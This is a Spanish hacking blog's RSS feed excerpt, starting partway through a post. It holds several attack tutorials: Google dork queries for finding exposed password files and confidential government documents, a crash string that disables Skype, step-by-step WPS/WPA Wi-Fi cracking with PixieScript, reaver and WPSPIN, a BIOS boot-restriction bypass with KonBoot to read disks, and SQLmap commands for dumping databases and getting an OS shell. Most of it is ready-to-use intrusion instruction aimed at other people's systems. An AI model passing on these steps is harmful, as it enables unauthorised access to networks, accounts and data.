<li><em>&ldquo;robots.txt&rdquo; &ldquo;disallow:&rdquo; filetype:txt</em>&nbsp;En el archivo robots.txt el webmaster dice qu&eacute; partes de su web no quiere que Google muestre, es decir, la informaci&oacute;n m&aacute;s confidencial de la web, que es lo 1&ordm; que quiere mirar un hacker. Haciendo la b&uacute;squeda anterior, Google muestra m&aacute;s de 2 millones de webs con archivos robots.txt, que indican al hacker su informaci&oacute;n m&aacute;s delicada.</li>
<li><em>allintitle:restricted filetype:doc site:gov</em>&nbsp;Encontrar informaci&oacute;n &ldquo;interesante&rdquo; en sitios de Gobiernos. Se puede cambiar &ldquo;restricted&rdquo; por &ldquo;top secret&rdquo; o &ldquo;confidential&rdquo;. Y &ldquo;doc&rdquo; por &ldquo;pdf&rdquo; o &ldquo;txt&rdquo;. O &ldquo;gov&rdquo; por &ldquo;mil&rdquo;, para sitios del ej&eacute;rcito&hellip;</li>
<li><em>passwords|contrase&ntilde;as|login|contrase&ntilde;a filetype:txt site:web.com</em>&nbsp;Busca contrase&ntilde;as y logins en documentos txt de la web web.com. Se puede ir cambiando el filetype o la web, para tener resultados diferentes.</li>
<li><em>inurl:intranet filetype:doc confidential</em>&nbsp;Igual que los 2 anteriores, admite variaciones</li>
<li><em>&ldquo;Index of&rdquo; / &ldquo;chat/logs&rdquo;</em>&nbsp;Logs de chats almacenados en servidores</li>
<li><em>index.of.dcim</em>&nbsp;300.000 p&aacute;ginas con carpetas con fotos para descargar gratis. DCIM significa Digital Camera Image Dumps, y es el nombre que viene por defecto en las carpetas de fotos de las c&aacute;maras digitales. Esta b&uacute;squeda muestra personas que han subido las carpetas de fotos a una web tal cual, sin cambiar siquiera el nombre.</li>
<li><em>intitle:index.of &ldquo;parent directory</em>&rdquo; Listado de directorios de un servidor, para ver las carpetas y explorarlas. Son los m&aacute;s cl&aacute;sicos. Otros con funciones similares son:</li>
<li><em>intitle:&rdquo;index of&rdquo; &ldquo;Index of /&rdquo;</em></li>
<li><em>intitle:&rdquo;index of&rdquo; inurl:&rdquo;admin&rdquo;</em></li>
<li><em>intitle:index.of passwd</em>&nbsp;Permite navegar por el servidor y encontrar archivos de contrase&ntilde;as. Con frecuencia no funciona, porque la gente ha hecho webs con virus para salir arriba en esa b&uacute;squeda y que los &ldquo;lammers&rdquo; piquen y pinchen los links, por eso no lo pongo en el apartado 1 de esta recopilaci&oacute;n&hellip;</li>
</ul>
<p><strong>7) Informaci&oacute;n de apoyo al acceso</strong>. Ejemplos:</p>
<ul>
<li><em>&ldquo;Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)&rdquo; ext:log</em>&nbsp;Procesos ejecut&aacute;ndose en el servidor, para saber qu&eacute; antivirus tiene, si tiene firewall&hellip;</li>
<li><em>inurl:&rdquo;:8080&Prime; -intext:8080</em>&nbsp;Servidores que ejecutan servicios en el puerto 8080. A veces s&oacute;lo con pinchar la url se entra directamente, a veces pide login, a veces es informaci&oacute;n &ldquo;confidencial&rdquo;, o a veces son webs normales. Hay m&aacute;s de 1 mill&oacute;n de resultados en Google.</li>
<li><em>intitle:index.of ws_ftp.log</em>&nbsp;Logs de acceso por FTP, que incluyen las rutas locales de los archivos que se suben y horas de subida. M&aacute;s de 1 mill&oacute;n de logs disponibles en Google.</li>
<li><em>site:sitio.com -site:www.sitio.com</em>&nbsp;Sirve para conocer subdominios, intranets, dominios para la gesti&oacute;n del correo, etc. Suele producir varias ventanas de login.</li>
<li><em>intitle:&rdquo;the page cannot be found&rdquo; &ldquo;please * * following&rdquo; &ldquo;Internet * Services&rdquo;</em>&nbsp;Permite saber el tipo de servidor.</li>
</ul>
<p>Esto era s&oacute;lo un resumen, sin &aacute;nimo de ser exaustivo. Hay bases de datos de&nbsp;<strong>Google dorks</strong>, que as&iacute; se llaman estos &ldquo;fallos&rdquo; de Google en:&nbsp;<a href="http://www.exploit-db.com/google-dorks/" target="_blank">Exploit Database Google Dorks</a>&nbsp;y&nbsp;<a href="http://www.hackersforcharity.org/ghdb/" target="_blank">Google Hacking Database</a>. Hay&nbsp;<strong>Google Dorks</strong>&nbsp;para cada plugin o m&oacute;dulo de WordPress o Joomla que tienen vulnerabilidades. Los&nbsp;<strong>Google Dorks</strong>&nbsp;permiten encontrarlos y hackear las webs con plugins no actualizados.</p>
<p>Por &uacute;ltimo, hay programas que permiten probar autom&aacute;ticamente todas las vulnerabilidades de un sitio web que muestra Google, para no tener que ir buscando una a una. Algunos de los programas que hacen esto son:</p>
<ul>
<li>Site Digger: recomendado, es el que yo uso m&aacute;s a menudo para pruebas de seguridad de mis clientes&nbsp;</li>
<li>Wikto</li>
<li>SearchDiggit</li>
<li>Athena (de snakeoillabs.com): no recomendable porque viola pol&iacute;tica de Google, porque no usa GoogleApi para las peticiones</li>
<li>Gooscan: no recomendable por lo mismo que el anterior</li>
</ul>
<p>&nbsp;</p>
</div>
<p>&nbsp;</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Los 8 caracteres hacen que Skype se bloquee y no vuelva a iniciar</title>
		<link>https://emanuelpaxtian.com/blog/los-8-caracteres-hacen-que-skype-se-bloquee-y-no-vuelva-a-iniciar/</link>
		
		<dc:creator><![CDATA[Psoluciones]]></dc:creator>
		<pubDate>Wed, 03 Jun 2015 17:58:28 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Sin categoría]]></category>
		<guid isPermaLink="false">https://ada70skype-web-1.jpg</guid>

					<description><![CDATA[Un nuevo bug de Skype est&#225; provocando que los usuarios no tengan m&#225;s remedio que reinstalar la app, y lo peor es que es demasiado f&#225;cil explotarlo. El bug afecta&#8230;]]></description>
										<content:encoded><![CDATA[<p><span>Un nuevo bug de Skype est&aacute; provocando que los usuarios no tengan m&aacute;s remedio que reinstalar la app, y lo peor es que es demasiado f&aacute;cil explotarlo.</span></p>
<p>El bug afecta a las versiones de Skype de Windows, Android y iOS, aunque algunos informes aseguran que las versiones de Mac y la app de Skype para Windows de tablets no se han visto afectadas.</p>
<p>Lo &ldquo;gracioso&rdquo; es c&oacute;mo podemos explotar el bug:<strong>mandando los caracteres &ldquo;http://:&rdquo; sin las comillas</strong>. Usuarios que recibieron un mensaje con esos caracteres vieron c&oacute;mo la app se bloque&oacute; instant&aacute;neamente y fueron a los foros oficiales de Skype para quejarse.</p>
<p>Lo peor de todo no es que el bug bloquee la app: es que si el mensaje con esos caracteres se queda en nuestro historial&nbsp;<strong>tampoco podremos volver a iniciar la app</strong>. Incluso si conseguimos borrar el mensaje de nuestro historial, la app vuelve a descargarlo y a bloquearse cuando se inicia.</p>
<p>La &uacute;nica manera de arreglarlo, al menos en la versi&oacute;n de Windows, es instalar una versi&oacute;n antigua del programa para borrar la cach&eacute; y pedir a la persona que te mand&oacute; el mensaje que lo borre para que Skype no lo descargue cuando inicies la app.</p>
<p>Skype ha lanzado una nueva versi&oacute;n de su app para todos los sistemas que soluciona el bug en cuesti&oacute;n. Pod&eacute;is descargarosla de la&nbsp;<a href="http://www.skype.com/download" target="_blank">p&aacute;gina oficial de Skype</a>&nbsp;o actualizando la app.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Crackeando Redes WPA con PixieScript y WifiSlax</title>
		<link>https://emanuelpaxtian.com/blog/crackeando-redes-wpa-con-pixiescript-y-wifislax/</link>
		
		<dc:creator><![CDATA[Psoluciones]]></dc:creator>
		<pubDate>Wed, 03 Jun 2015 10:22:05 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Sin categoría]]></category>
		<guid isPermaLink="false">https://1e6c8pixie.png</guid>

					<description><![CDATA[En esta entrada les ense&#241;are a usar e instalar el PixieScript con WifiSlax a m&#243;dems que tengan&#160; chipset Ralink, Broadcom y algunos modelos Realtek &#160;y sacar una clave en menos&#8230;]]></description>
										<content:encoded><![CDATA[<p>En esta entrada les ense&ntilde;are a usar e instalar el PixieScript con WifiSlax a m&oacute;dems que tengan&nbsp; chipset Ralink, Broadcom y algunos modelos Realtek &nbsp;y sacar una clave en menos de 2 minutos.</p>
<p>Para instar PixieScript&nbsp; debemos dirigirnos al siguiente enlace y descargar el archivo</p>
<p>&nbsp;</p>
<p><a href="https://mega.co.nz/%23!wpFUUZCC!K_Y2kiU_7ioA9-KRK-qTxxu6YYC25bqvFZboefnj9Pk">https://mega.co.nz/#!wpFUUZCC!K_Y2kiU_7ioA9-KRK-qTxxu6YYC25bqvFZboefnj9Pk</a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><strong>INSTALACI&Ograve;N</strong></p>
<p>&nbsp;</p>
<p>Para facilitar las cosas, poner la carpeta descargada en el escritorio y descomprimirla.<br /> Ahora desde la consola ejecutamos lo siguiente:</p>
<p>&nbsp;</p>
<p>cd PixieScript_v2.4<br /> chmod +x INSTALADOR<br /> ./INSTALADOR</p>
<p>&nbsp;</p>
<p>Lo primero que har&aacute; es descargar pixiewps y reaver, a continuaci&oacute;n aplicar&aacute; el parche al reaver y lo instalara en el sistema</p>
<p>&nbsp;</p>
<p><iframe loading="lazy" src="https://www.youtube.com/embed/4BdTt5nCxZw" frameborder="0" width="560" height="315"></iframe></p>
<p><strong>ES NECESARIO TENER CONEXION A INTERNET PARA INSTALAR CORRECTAMENTE EL SCRIPT</strong></p>
<p>&nbsp;</p>
<p><strong>Uso</strong></p>
<p>&nbsp;</p>
<ul>
<li>Ya con esto solos nos dirigiremos al men&uacute; de wifislax entramos a wifislax</li>
<li>Entramos a WPA WPS</li>
<li>Buscamos PixieScript</li>
<li>Llegado e este paso se abrir&aacute; una ventana donde nos ira preguntando el asistente que debemos hacer</li>
<li>Primero nos preguntara si deseamos activar el modo debug seleccionar que no con N</li>
<li>Despu&eacute;s nos dar&aacute; la opci&oacute;n disponibles seleccionamos la opci&oacute;n 3 para que nos liste las redes que est&aacute;n al alcance</li>
<li>Aqu&iacute; nos mostrara las interfaces que detecta y nos&nbsp; avisara si detecta procesos que interfieran con el ataque y preguntara si deseamos detenerlos le damos que si (s)</li>
<li>Luego nos preguntara si queremos cambiar la MAC yo le pongo que no en caso de que ustedes la quieran cambiar solo deber&aacute;n poner la mac por la cual la cambiarian</li>
<li>Luego nos pregunta por cuanto tiempo el Wash buscara objetivo pongalne 30 segundos</li>
<li>Acto seguido pregunta cuanto tiempo el reaver probara el pin generado p&oacute;ngale 30 segundos si la se&ntilde;al esta potente o unos 60 si la se&ntilde;al es d&eacute;bil</li>
<li>Esperaremos el tiempo que le pusimos y nos saldr&aacute;n las redes que detecta que tiene el WPS activado</li>
<li>Aqu&iacute; seleccionaremos la red a la cual queremos atacar poniendo el numero de ella y esperaremos que el reaver haga su trabajo .</li>
<li>Si el modem es vulnerable aparecer&aacute; unos n&uacute;meros en verde y nos dar&aacute; el PIN y la contrase&ntilde;a.</li>
</ul>
<p>&nbsp;</p>
<p><iframe loading="lazy" src="https://www.youtube.com/embed/saylvD2kGoo" frameborder="0" width="560" height="315"></iframe></p>
<p><strong>Comentarios</strong></p>
<ul>
<li>No todos los modem son vulnerables</li>
<li>Necesitan que el modem tenga el WPS activado</li>
<li>En ocasiones el PIN lo genera pero no da la clave esto puede deberse a que el tiempo que se le puso al reaver es muy poco para conectarse.</li>
</ul>
<p>&nbsp;</p>
<p>Saludos espero sugerencias y comentarios&nbsp;</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Usando WPSPIN  y JumpstarWPS para sacar claves WPA</title>
		<link>https://emanuelpaxtian.com/blog/usando-wpspin-y-jumpstarwps-para-sacar-claves-wpa/</link>
		
		<dc:creator><![CDATA[Psoluciones]]></dc:creator>
		<pubDate>Sun, 12 Apr 2015 23:29:31 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">https://7d51837.png</guid>

					<description><![CDATA[El Programa WPS-PIN es trabajo de Betis-Jesus del Foro Lampiweb.com Este Programa tiene una base que contiene PIN&#8217;s que Tienen por defecto de Algunas Marcas y Modelos de Routers y Modem. El Programa&#8230;]]></description>
										<content:encoded><![CDATA[<p>El Programa WPS-PIN es trabajo de Betis-Jesus del Foro Lampiweb.com<br />
Este Programa tiene una base que contiene PIN&#8217;s que Tienen por defecto de Algunas Marcas y Modelos de Routers y Modem.<br />
El Programa se Actualiza en Versiones Beta Cada Nueva Version se le Agregan Nuevos PIN&#8217;S para Aumentar su Compatibilidad.<br />
Este Programa Tiene Muchos <strong>PIN CORRECTOS</strong> que se Pueden Usar para Conectarce Mediante el WPS de Varios Modem y Router en Varios Paises, este programa es comaptibe con windows 7 y 8 64 bits.</p>
<p>El <strong>JumpstarWPS</strong> es un programa con el cual ya tienen el pin generado por WPSPIN nos conectaremos a la red automáticamente para su instalación es necesario tener en .net framework 4.5 ya que es requerido por este programa.</p>
<p>Como obtener la contraseña.</p>
<ol>
<li>Primero abriremos el <strong>WPSPIN</strong> y nos mostrar una pantalla como esta <img loading="lazy" decoding="async" src="../fotos/37.png" alt="" width="825" height="602" border="0" /></li>
<li>Ahí esta un menú donde seleccionaremos nuestro adaptador y seleccionaremos la casilla mostrar <strong>PIN</strong> para todas la redes.</li>
<li>Luego le daremos botón derecho sobre la red de la cual deseamos obtener la clave y pulsaremos sobre información de esta red.</li>
<li>Nos dirigiremos al <strong>jumpstar</strong> y nos aparecer la primera ventana donde seleccionaremos la primera opción del menú.<img loading="lazy" decoding="async" src="../fotos/644232.png" alt="" width="526" height="388" border="0" /></li>
<li>La siguiente ventana que nos aparecerá es la que muestro a continuación donde seleccionaremos la segunda opción para que posterior mente metamos el PIN que nos genero el <strong>WPSPIN.<img loading="lazy" decoding="async" src="../fotos/63.png" alt="" width="808" height="607" border="0" /></strong></li>
<li>En esta pantalla introducimos el PIN.<img loading="lazy" decoding="async" src="../fotos/8.png" alt="" width="808" height="596" border="0" /></li>
<li>Ahi nos mostrar una red para probar de la cual elegiremos la red del cual es el PIN <img loading="lazy" decoding="async" src="../fotos/23.PNG" alt="" width="558" height="419" border="0" /></li>
<li>si el pin es correcto nos saldrá la siguiente ventana.</li>
</ol>
<p><img loading="lazy" decoding="async" src="../fotos/image015.jpg" alt="" width="353" height="292" border="0" /></p>
<p>&nbsp;</p>
<p><a href="https://mega.co.nz/#!eF0gyZYY!6bE8clW8cC7lIYOdNvv9EvuqskH_zX3TztN_4eWjhGs">DESCARGAR WPSPIN</a></p>
<p><a href="https://mega.co.nz/#!KRUBFZ5Z!t3p8UMzTzf9xhb4_Kp57GCtJwDlxjBHWzP_aGhU-etA">DESCARGAR JUMPSTAR</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Libera gratis tu Blackberry con los siguientes pasos</title>
		<link>https://emanuelpaxtian.com/blog/libera-gratis-tu-blackberry-con-los-siguientes-pasos/</link>
		
		<dc:creator><![CDATA[Psoluciones]]></dc:creator>
		<pubDate>Sun, 19 Oct 2014 14:29:40 +0000</pubDate>
				<category><![CDATA[Celulares]]></category>
		<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">https://49554mep2.jpg</guid>

					<description><![CDATA[Para todos aquellos que quieran su celular liberado solo atienen que tener su número de IMEI y su MEP y en este tutorial les explicare como sacar los dos y&#8230;]]></description>
										<content:encoded><![CDATA[<p>Para todos aquellos que quieran su celular liberado solo atienen que tener su número de IMEI y su MEP y en este tutorial les explicare como sacar los dos y como sacar el MEP2 a través del siguiente programa.</p>
<p><strong><span data-mce-mark="1">PARA SACAR IMEI: </span></strong></p>
<p>Presionan *#06# y lo obtienen.</p>
<p>o tambien pueden verlo detras de la bateria.</p>
<p><img decoding="async" src="https://lh4.googleusercontent.com/-v1yVvxMgYnM/TXkpSPta2wI/AAAAAAAAA9U/KrLrUvNV_rU/s1600/PRD+BlackBerry.bmp" alt="LIBERA GRATIS TU BLACKBERRY !" border="0" /><span data-mce-mark="1"> </span></p>
<p><strong>COMO OBTENER EL CODIGO MEP</strong></p>
<p>1a. Lo primero que tenemos que hacer es en la pantalla principal de la blackberry pulsar y mantener pulsado a la vez las teclas <kbd>ALT</kbd> + <kbd>SHIFT</kbd> + <kbd>H</kbd><br />
1b. Si nuestra Blackberry es de la serie Pearl debemos pulsar y mantener pulsado la tecla <kbd>ALT</kbd> y marcar las letras <kbd>E A C E</kbd><br />
1c. Y si es de la serie Storm</p>
<p>Automaticamente nos aparece un menú oculto con todos los datos de nuestra Blackberry. Necesitamos que rellenes los datos PIN, APP y Uptime en nuestro calculador.</p>
<p align="center"><img decoding="async" src="http://www.movical.net/images/bb1.gif" alt="" border="0" /></p>
<div id="datos-codigo" class="azul">
<div class="superior calculator">Codigo MEP BLackberry</div>
<div class="inferior"></div>
</div>
<p>Pagina para sacar el codigo unico y en ella deberemos poner los datos mostrados en la imagen anterior</p>
<p><a href="http://www.movical.net/codigo-mep-blackberry.php">http://www.movical.net/codigo-mep-blackberry.php</a></p>
<p>Nuestro calculador nos ha generado un código único y persona de nuestra blackberry. Marcando este código accederemos al menú de ingeniería de la Blackberry como el de la siguiente imagen.</p>
<p>Simplemente marca el código (no saldrá nada en la pantalla hasta que acabes de marcarlo).<br />
Nota: Para los números mantén pulsado <kbd>ALT</kbd> más el número, para las letras simplemente pulsa el botón de la letra.</p>
<p align="center"><img decoding="async" src="http://www.movical.net/images/bb2.gif" alt="" border="0" /></p>
<p>Dentro de este menú escogemos las opciones:</p>
<p>OS Engineering Screens</p>
<p>Device Info</p>
<p align="center"><img decoding="async" src="http://www.movical.net/images/bb3.gif" alt="" border="0" /></p>
<p>Una vez dentro de Device Info deslizamos el scroll hacia abajo y una de las lineas pondrá algo asi como MEP-XXXXX-XXX, este es el código MEP de nuestra blackberry.</p>
<p>Ahora deberemos acceder a la siguiente direccion y descargar el siguiente programa con el cual podremos obtener el MEP2 en el</p>
<p><a href="https://mega.co.nz/#!JcJz2IzJ!xPAtSgR_rcycEhQIerjePNdXjT_muTFlmH5Pgc2YqLE">https://mega.co.nz/#!JcJz2IzJ!xPAtSgR_rcycEhQIerjePNdXjT_muTFlmH5Pgc2YqLE </a></p>
<p><img loading="lazy" decoding="async" src="../fotos/mep2.jpg" alt="" width="551" height="417" border="0" /></p>
<p>&nbsp;</p>
<p>luego de obtener el MEP2 continuaremos con los siguientes pasos</p>
<ul>
<li> Desactivar todas las conexiones (en opcion Gestionar Conexiones&#8221;<img decoding="async" src="http://o1.t26.net/images/space.gif" alt="" border="0" />.</li>
<li>Ir a opciones ( settings )</li>
<li> Seleccionar opciones avanzadas ( advanced options ) .</li>
<li> Seleccione la opción tarjeta SIM ( SIM CARD )</li>
<li>Presione la opción del MENU &#8220;Mostrar el teclado&#8221; .</li>
<li> Mantenga presionada la tecla <kbd>ALT</kbd> (mayusculas) durante unos segundos y luego escriba MEPD ( al escribir mepd no le saldrán las letras en la pantalla ), esto abre un menú oculto de personalización.</li>
<li>Escriba MEP2 . Si no te es posible introducir el numero 2, activa el modo de teclado numerico y pulsa el 2. Este es el paso que más dificultades da a los usuarios, deberá intentarlo todas las veces que sean necesarias hasta que la secuencia quede bien introducida.</li>
<li>Ahora le aparecerá &#8220;Introduzca el codigo MEP&#8221; ( enter network mep code ) y deberá de introducir el código que nosotros le hemos facilitado y dele a aceptar. Si el código fuera erroneo se mostrará el mensaje &#8220;error de código&#8221;, espere durante unos segundos a que desaparezca y pruebe con otro de los códigos que le hemos enviado.</li>
<li>Una vez aceptado el código, reiniciar la BlackBerry y activar todas las conexiones Wireless (red movil, bluetooth&#8230;) si anteriormente las había desactivado.</li>
<li>Su BlackBerry está ahora libre</li>
</ul>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Evadiendo restricciones de BIOS al bootear un ISO desde el celular</title>
		<link>https://emanuelpaxtian.com/blog/evadiendo-restricciones-de-bios-al-bootear-un-iso-desde-el-celular/</link>
		
		<dc:creator><![CDATA[Psoluciones]]></dc:creator>
		<pubDate>Fri, 26 Sep 2014 12:10:46 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<guid isPermaLink="false">https://c9a59bukerpxe-litepxe-server-root-4-2-s-307x512.jpg</guid>

					<description><![CDATA[El año pasado durante una prueba de penetración un cliente solicitó que se obtuviera información de una computadora preparada con las últimas buenas prácticas de seguridad de la empresa, las&#8230;]]></description>
										<content:encoded><![CDATA[<p>El año pasado durante una prueba de penetración un cliente solicitó que se obtuviera información de una computadora preparada con las últimas buenas prácticas de seguridad de la empresa, las cuales incluían limitan desde el BIOS el booteo a únicamente un dispositivo autorizado. Ya que como saben, para obtener acceso a toda la información de un disco duro sin cifrar, únicamente necesitas bootear desde un sistema operativo alterno. &#8211; See more at: http://www.websec.mx/blog/ver/Evadiendo-restricciones-de-BIOS-al-bootear-un-ISO-desde-el-celular#sthash.dQLL50mV.dpuf</p>
<div>El BIOS estaba configurado de tal manera que solicitaba password para su configuración y también para iniciar el sistema operativo. Lamentablemente -para ellos- esto no fue suficiente ya que los BIOS de las computadoras, en este caso Lenovo ThinkCentre modelo M81, tienen un modo de inicio alterno al cual es posible acceder si se provoca un error. Para provocar el error bastó con desconectar el teclado en el momento del inicio del BIOS. El modo alterno de inicio de BIOS permite bootear desde la red por lo que descargué y configuré una aplicación que actua como servidor de booteo PXE (BukerPXE), descargue un ISO para iniciar en Windows sin password (KonBoot) y con la ayuda de mi Huawei HG520 (sabían que tenía que haber un router involucrado en mi post) hice que la computadora booteara el ISO desde el celular y pude acceder a toda su información.</div>
<div>Estos son los pasos que seguí:</div>
<h4></h4>
<div><a href="https://play.google.com/store/apps/details?id=com.bukerservebeer.bukerpxelite"><img loading="lazy" decoding="async" src="https://lh6.ggpht.com/1keXCFG8kPFiAkGcP20NSWwmyMokv0JC8BWZIZ3zy_-eWAsy1Bd1ePJkIezjgo-X-NY=h310-rw" alt="" width="174" height="310" border="0" /></a></div>
<p>Instala la siguiente aplicación: <a href="https://play.google.com/store/apps/details?id=com.bukerservebeer.bukerpxelite">https://play.google.com/store/apps/details?id=com.bukerservebeer.bukerpxelite</a></p>
<p>&nbsp;</p>
<h4></h4>
<div>Obten el archivo ISO de tu elección (en mi caso KonBoot.iso),</div>
<div>Copialo al directorio bukerpxelite/tftpboot</div>
<div>Edita el archivo bukerpxelite/tftpboot/pxelinux.cfg/default agregando lo siguiente:</div>
<div><strong><code>LABEL Boot Iso</code></strong></div>
<div><strong><code>MENU LABEL ISO Boot</code></strong></div>
<div><strong><code>     kernel pxelinux.cfg/c32/memdisk</code></strong></div>
<div><strong><code>     append iso raw initrd=KonBoot.iso</code></strong></div>
<div><strong><code>TEXT HELP</code></strong></div>
<div><strong><code>     ISO Boot<br />
</code></strong></div>
<div><code><code><strong>ENDTEXT</strong></code></code>&nbsp;</p>
</div>
<h4></h4>
<div>Conecta via WiFi el celular al ruteador,</div>
<div>Conecta via cable inalámbrico la computadora al ruteador,</div>
<div>Ejecuta BukerPXE y da click en el botón de la parte superior para iniciar el servidor. *El texto del boton cambia en base al idioma del telefono.</div>
<h4></h4>
<div>En caso de que se requiera evadir la restricción de los BIOS que lo permiten, es posible provocar el error con desconectar el teclado en el momento del inicio del BIOS. Se escucharán dos pitidos y se iniciará el booteo alterno desde la red.</div>
<p>Tomado de : http://www.websec.mx/blog/ver/Evadiendo-restricciones-de-BIOS-al-bootear-un-ISO-desde-el-celular</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Comandos SQLmap: ataques SQLi &#8211; Inyección SQL</title>
		<link>https://emanuelpaxtian.com/blog/comandos-sqlmap-ataques-sqli-inyeccion-sql/</link>
		
		<dc:creator><![CDATA[Psoluciones]]></dc:creator>
		<pubDate>Sun, 24 Aug 2014 21:31:43 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Seguridad]]></category>
		<guid isPermaLink="false">https://a6941sql-injection2.jpg</guid>

					<description><![CDATA[SQLmap es una de las herramienta más conocidas para hacer ataques SQLi (SQL Injection) escrita en Python. SQLmap se encarga de realizar peticiones a los parámetros de una URL que&#8230;]]></description>
										<content:encoded><![CDATA[<p><strong>SQLmap</strong> es una de las herramienta más conocidas para hacer ataques SQLi (SQL Injection) escrita en Python. SQLmap se encarga de realizar peticiones a los parámetros de una URL que se le indiquen, ya sea mediante una petición GET, POST, en las cookies, etc. Es capaz de explotar todo tipo de SQLi como union-base, time-base-blind, base-blind-injection, heavy-queries, etc.</p>
<p>Permite realizar de manera automática 6 técnicas de ataques:</p>
<ul>
<li>boolean-based blind</li>
<li>time-based blind</li>
<li>error-based</li>
<li>UNION query</li>
<li>stacked queries</li>
<li>out-of-band</li>
</ul>
<h2>Tutorial &#8211;  Manual Uso básico SQLmap</h2>
<h4>Errores:</h4>
<div>http://www.elhacker.net/noticia.php?id=1&#8242;</p>
<ul>
<li>&#8211;dbms=mysql</li>
</ul>
</div>
<blockquote class="tr_bq"><p>[..] Error: You have an error in your SQL syntax [..]</p></blockquote>
<blockquote class="tr_bq"><p>Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in [..]</p></blockquote>
<ul>
<li>&#8211;dbms=mssql</li>
</ul>
<blockquote class="tr_bq"><p>Microsoft OLE DB Provider for ODBC Drivers error [..]</p></blockquote>
<blockquote class="tr_bq"><p>Server Error in ‘/’ Application. Unclosed quotation mark before the character string [..]</p></blockquote>
<ul>
<li>&#8211;dbms=orcale</li>
</ul>
<blockquote class="tr_bq"><p>java.sql.SQLException: ORA-00933: SQL command not properly ended at [..]</p></blockquote>
<p>Requisitos &#8211; Dependencias</p>
<p>&nbsp;</p>
<ul>
<li>Python 2.6 o 2.7 (no funciona con 3.0)</li>
<li>gzip</li>
<li>ssl</li>
<li>sqlite3</li>
<li>zlib</li>
</ul>
<p>Instalación clonando el repositorio git</p>
<blockquote class="tr_bq">
<pre>git clone git://github.com/sqlmapproject/sqlmap.git</pre>
<pre>cd sqlmap</pre>
</blockquote>
<p>Uso:</p>
<blockquote class="tr_bq">
<pre><code>python sqlmap.py [opciones]</code></pre>
</blockquote>
<p>&nbsp;</p>
<ul>
<li>&#8211;url  url  (-u) con la variable vulnerable ejemplo elhacker.net/noticia.php?id=1</li>
<li><strong>-p</strong> (buscar otra variable vunlerable) elhacker.net/noticia.php?id=1&amp;user</li>
<li><strong>&#8211;data</strong> si hay un formulario GET,POST los campos vulnerables</li>
<li><strong><code>--</code>level=n </strong>cinco niveles según dificultad</li>
<li>&#8211;dbs listar las bases de datos</li>
<li><strong><code></code>&#8211;dbms</strong>  motor de la base de datos (MySQL,SQL Server ,etc)</li>
<li> -D indicamos la base de datos a utilizar (-Database)</li>
<li> &#8211;tables mostrar las tablas disponibles</li>
<li><strong>-t</strong> nombre de la tabla <strong>&#8211;columns</strong></li>
<li><strong>&#8211;dump </strong>vuelca resultados, mostrar contenido de las tablas</li>
<li><strong>-C (Columnas) </strong>columnas a mostrar</li>
<li><strong>&#8211;wizard </strong>ejecuta un asistente</li>
<li><strong> &#8211;threads=n</strong> número de procesos (por defecto 1)</li>
<li><strong>&#8211;delay=n</strong> segundos de espera entre peticiones http</li>
<li><strong>&#8211;current-db</strong> base de datos que está usando actualmente</li>
<li><strong>&#8211;current-user </strong>ver usuario que está ejecutando</li>
<li><strong>&#8211;is-dba –current-db </strong>ver si el usuario es el dba de la BD</li>
<li><strong>&#8211;privileges </strong>ver los privilegios del usuario (alter, create, drop, execute)</li>
<li>&#8212;<strong>file-read </strong>path (ruta) leer ficheros</li>
<li><strong>&#8211;sql-shell </strong>obtener una sql en shell</li>
<li><strong>&#8211;os-shell </strong>obtener shell en el servidor (asp es la 1, aspx 2, jsp 3, php 4) (si se poseen los suficientes privilegios y un FPD (Full Path Disclosure)</li>
<li> <strong>&#8211;headers</strong>= cabeceras del navegador</li>
<li><strong>&#8211;random-agent </strong>cabeceras del navegador aleatorias</li>
<li><strong>&#8211;time-sec</strong>= Segundos para retrasar la respuesta de DBMS (por defecto 5)</li>
<li><strong>&#8212;technique= </strong>: Se utiliza para seleccionar la técnica que se va a utilizar en la inyección ( B &#8211; E &#8211; U &#8211; S &#8211; T &#8211; Q.) Boolean-based, Error-based, Union, Stacked querys, Time-based, Inline queries</li>
<li><strong>&#8211;flush-session</strong></li>
</ul>
<div>&#8211; Si el SQLi es Blind Boolean Based , se especifica con una &#8220;B&#8221;</div>
<div>&#8211; Si el SQLi es Error Based/Double Query , se especifica con una &#8220;E&#8221;</div>
<div>&#8211; Si el SQLi es Union Based , se especifica con una &#8220;U&#8221;</div>
<div>&#8211; Si el SQLi es Stacked querys , se especifica con una &#8220;S&#8221;<br />
&#8211; Si el SQLi es Time Based , se especifica con una &#8220;T&#8221;</div>
<div>&#8211; Si el SQLi es Inline queries , se especifica con una &#8220;Q&#8221;</div>
<ul>
<li><strong>&#8211;forms </strong>si queremos que busque automáticamente los campos de formularios</li>
<li><strong>&#8211;proxy= </strong>usar servidor proxy</li>
<li><strong>&#8211;sql-query</strong> añadir consulta sql</li>
<li><strong>&#8211;tamper</strong>= scripts ofuscación y bypass (ejemplo space2mysqlblank.py, charencode.py, base64encode.py, randomcomments.py, etc)</li>
<li><strong>&#8211;chek-tor</strong> &#8212;&gt; User Tor Anonymity Network</li>
<li><strong>&#8211;tor-port </strong>&#8212;&gt; Set Tor proxy port other than default</li>
<li><strong>&#8211;tor-type </strong>&#8212;&gt; Set Tor proxy type (HTTP (default ), SOCKS4 or SOCKS5)</li>
</ul>
<p>Listado completo  en la documentación oficial:</p>
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage">https://github.com/sqlmapproject/sqlmap/wiki/Usage</a></li>
</ul>
<p><a href="https://github.com/aramosf/sqlmap-cheatsheet/blob/master/sqlmap%20cheatsheet%20v1.0-SBD.pdf"><strong>Descargar Cheatsheet para SQLMap</strong></a>  cortesía de SecurityByDefault:</p>
